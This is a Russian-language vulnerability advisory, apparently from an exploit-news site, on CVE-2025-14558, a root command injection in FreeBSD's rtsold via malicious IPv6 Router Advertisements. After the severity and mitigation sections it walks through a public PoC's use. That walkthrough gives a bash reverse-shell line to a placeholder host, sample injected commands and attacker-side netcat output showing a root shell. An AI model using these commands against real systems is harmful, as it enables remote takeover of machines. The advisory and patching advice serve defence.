🚨 CVE-2025-14558 : Критическое удалённое выполнение кода в FreeBSD (IPv6)
🧠 Обзор
CVE-2025-14558 — это критическая уязвимость удалённого выполнения кода (RCE), затрагивающая системы FreeBSD, использующие сервисы маршрутизации IPv6. Ошибка в обработке ненадёжного сетевого ввода позволяет злоумышленникам выполнять произвольные команды оболочки.
📊 Серьёзность
Оценка CVSS v3:9.8 / 10 🔥
Уровень риска:Критический
Требуемые привилегии: Отсутствуют
Взаимодействие с пользователем: Не требуется
🎯 Поражённые компоненты
rtsol(8)
rtsold(8)
Системы FreeBSD, использующие IPv6 Stateless Address Autoconfiguration (SLAAC)
Вредоносные пакеты Router Advertisement (RA) для IPv6 могут содержать сконструированную опцию Domain Search List
Ввод передаётся небезопасно в resolvconf(8)
Некорректное экранирование команд оболочки позволяет внедрение команд
Приводит к произвольному выполнению команд с правами root
🕸️ Вектор атаки
🌐 Сетевой
📍 Злоумышленник должен находиться в том же сегменте локальной сети
Аутентификация или учётные данные не требуются
💥 Воздействие
В случае успешной эксплуатации злоумышленник может:
Получить полный контроль над системой
Выполнять произвольные команды
Изменять конфигурацию системы
Обеспечить постоянство присутствия или перемещение по сети
🧪 Наличие эксплойта
✅ Существует публичное Proof-of-Concept (PoC)
Демонстрирует выполнение команд через сконструированные IPv6 RA-пакеты
🛡️ Смягчение и защита
Настоятельно рекомендуемые действия:
🔧 Примените официальные патчи безопасности FreeBSD
🚫 Отключите rtsol / rtsold, если IPv6 RA не требуется
🔒 Фильтруйте или блокируйте ненадёжные Router Advertisements IPv6
🧱 Используйте сегментацию сети, чтобы ограничить доступ локального злоумышленника
📝 Ключевой вывод
Любая система FreeBSD, прослушивающая объявления маршрутизации IPv6 в ненадёжной сети, подвергается высокому риску.
Немедленно установите патч или отключите затронутые сервисы.
Если PoC-скрипт для CVE-2025-14558 успешно сработает на уязвимой системе FreeBSD (без патча, с работающим rtsold, обрабатывающим IPv6 RA-сообщения):
На целевой машине (уязвимая FreeBSD):
Внедрённая команда выполняется немедленно с правами root (поскольку rtsold запущен от root и вызывает /sbin/resolvconf с вредоносным доменом).
По умолчанию в консоли или логах не появляется видимого вывода (команда выполняется в фоне бесшумно).
Примеры того, что происходит:
Для простого теста, например --command "id > /tmp/pwned":
Для обратного шелла, например --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":
На целевой машине нет немедленных видимых изменений, но будет попытка подключения к вашему слушателю.
Проверьте на целевой машине с помощью команд:
root@kitploit:~
ls -l /tmp/pwned
cat /tmp/pwned
На стороне атакующего (запуск скрипта):
Скрипт выводит:
root@kitploit:~
[+] Sending malicious RA on eth0
[+] Injected command: id > /tmp/pwned
[+] Target must run vulnerable rtsold and process the RA
[+] Done. Check target for execution (e.g. /tmp/pwned)
Для обратного шелла: в случае успеха ваш nc -lvnp 4444 получает подключение и root-шелл:
root@kitploit:~
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
bash: cannot set terminal process groups: No job control in this shell
bash: no job control in this shell
root@vulnerable-host:~ #
(Теперь у вас root-шелл — вводите команды, например id, whoami и т.д.)
Если это не работает:
Файл не создан/нет подключения → причины: целевая система пропатчена, rtsold не запущен, находятся не в одном L2-сегменте, брандмауэр блокирует RA или IPv6 отключён.
Это можно наблюдать только в контролируемой лаборатории на уязвимой системе FreeBSD (до патча от 16 декабря 2025 г.). По состоянию на 23 декабря 2025 г. публичных отчётов об эксплуатации в реальном мире нет. Немедленно установите патч в production-среде.
⚠️ Отказ от ответственности: Эта информация предоставлена только в ознакомительных целях и не является рекомендацией по безопасности, юридической или операционной консультацией. Всегда изучайте и следуйте официальным предупреждениям, патчам и руководствам от вендора перед принятием мер по устранению.